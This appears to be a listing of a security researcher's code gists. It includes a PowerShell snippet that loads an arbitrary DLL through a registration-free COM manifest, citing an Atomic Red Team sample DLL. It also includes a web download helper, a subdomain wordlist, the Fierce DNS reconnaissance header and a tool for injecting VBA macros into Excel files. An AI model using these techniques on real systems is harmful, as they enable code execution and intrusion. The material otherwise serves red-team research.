coldfusion39

#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

# Sample DLL To inject here 
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> 	<file name="Anyname.dll.anything">     	<comClass         	description="Any Description HERE"         	clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both"         	progid="JustMakeSomethingUp"/> 	</file>  </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");

coldfusion39

function Greetings {
  [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
          [Parameter(Mandatory = $True)]
          [String]
          $name = 'anon'
  )
  write-host "Hello World, and $name!"
}

coldfusion39

#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#

coldfusion39

#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#

coldfusion39

#No Proxy
function NoProxy {
    Param($URL);
    $WC = New-Object Net.WebClient
    $WC.DownloadString($URL)
}

#Proxy 1
function Proxy1 {
    Param($URL);

coldfusion39

#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#

coldfusion39

*.b
*.blog
*.blogs
*.dev
*.mail
*.red
*.s
*.search
*.staging
0

coldfusion39

#!/usr/bin/perl

#########################################
# Fierce v0.9.9 - Beta 03/24/2007
# By RSnake http://ha.ckers.org/fierce/
# Threading and additions by IceShaman
#########################################

use strict;
use Net::hostent;

coldfusion39

Keybase proof

I hereby claim:

• I am coldfusion39 on github.
• I am coldfusion (https://keybase.io/coldfusion) on keybase.
• I have a public key whose fingerprint is C8FC 13D1 14FA F3F4 E094 2E54 F177 C9A1 5B3D 3C2E

To claim this, I am signing this object:

coldfusion39

<#
.SYNOPSIS
Inject VBA macro code into an Excel document.

Author: coldfusion
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
.DESCRIPTION